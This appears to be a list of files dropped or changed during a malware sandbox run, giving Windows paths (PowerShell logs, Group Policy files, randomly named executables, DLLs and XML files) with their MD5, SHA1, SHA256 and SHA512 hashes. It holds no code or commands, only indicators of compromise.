C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d8e9dd53f4770d60475993f52eedf47
SHA1 70e16a001e8c0964bf458ee1ae85b3818109886c
SHA256 2bdee75c58aaa5ebb9a53fe62a04c7bf4bf4ac9d132e99b1906839b81b37650b
SHA512 c82e3538deb61b61372f364179c8f53649b571db08ed4cadca86939083068ce4c9f3ab697d7a3938dec747e2f3f91cff9feb5d9f46edee60b16c8b19bc694434

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 279c01cba658fc0ad82f3c201619656c
SHA1 d73ebfda7c8708716b10de2819a7fed64a295e60
SHA256 ac063b67eaa6a6476ab856e4bd9ff4cf79bbe831880b18eb1cbb34948c7c6cab
SHA512 cf385228df756d6fc05a52e8883e89df71dc91434255143a200d9ed5eba13ce8a3635bc82991ea38bd35531056b3d286be785b451dab638b18293477f7542a55

C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml

MD5 0b70615de140d9c38dec29ee45e38c0c
SHA1 214e8ab935d92c0b80899b4f8176d7b6553ae40f
SHA256 80ee4f7231a37cef58b66032db0097dfb382bc7485cbbb7d108e0e6768d65064
SHA512 856dddb833c59cb7916d1ea71f4ed3f709b1b4de93c6aac5424ba28c8c5d2a56303c32723fe2894a6283049c305ce1c25c369dd4fc4e2969615b09a5c176679e

C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml

MD5 bca62f1dbd8ef93593f720a0c385fb4a
SHA1 221af80c09ce1aae022f845788019578e8d5e344
SHA256 0dccf83b357358e73e4994a9ec9526dcf8996aec78d3cd5c5ecff37bba0eb198
SHA512 1efebd44fbae669dfb6c48ff76fcb953e1eda0993591a4dbdc657591c5d7669a4d9090100489f3fd08371f5c95e71b120415c8e10cbf274e23c9c60905885d50

C:\ProgramData\YVKeAuHUOaLCRzVB\IveybOc.xml

MD5 99916aaab20feb22039a153723469c78
SHA1 6384215e681a3794ebcdfa587b5cc99ede536bf7
SHA256 fba97deffb211890ea12089454e72bec19c6d9352cd27779ed11de742d59a1a6
SHA512 0a819993f3de105b6c19e0d1a2a789103173b9c950a38cf3d45823f03570bc0de23e9999ba724a6a64bd9682cf5188680b4222f9f5e4dcbdb3c5fc4c07ffcb72

C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml

MD5 b640ef0e81b7882a96e275ac13faf2e0
SHA1 a84f0304a4effd14f8e830d9a6312c453db229fd
SHA256 6f5702619d3ca3e15e316b0fbb7a5618ed4fe91796c252ec00bee3f32614b755
SHA512 5108588b929dfed97e6ada1cbf5633bd57f236db3d2acc597d6619d9d00b1c64b29aa42ef32ce9535bcd522c5ac209db52089984df028024012438d225ed216e

C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml

MD5 875d8198ff6ec99c6b210dcd5a6b9897
SHA1 86ca980e780e2fcd138539c2b9727d9938c5e8a7
SHA256 561d617ccaf3a0beae67327cf102f683150e3ddb70881f837adf45e44f1b73eb
SHA512 8ad105ebf1fb915993c3ed0959f807c93593852c20e82805041dbe60d847ab822cdbbf9422c52e54e8f674504b46ab57c0981ddf4e7f92ff0cb44b99f286b53e

C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927
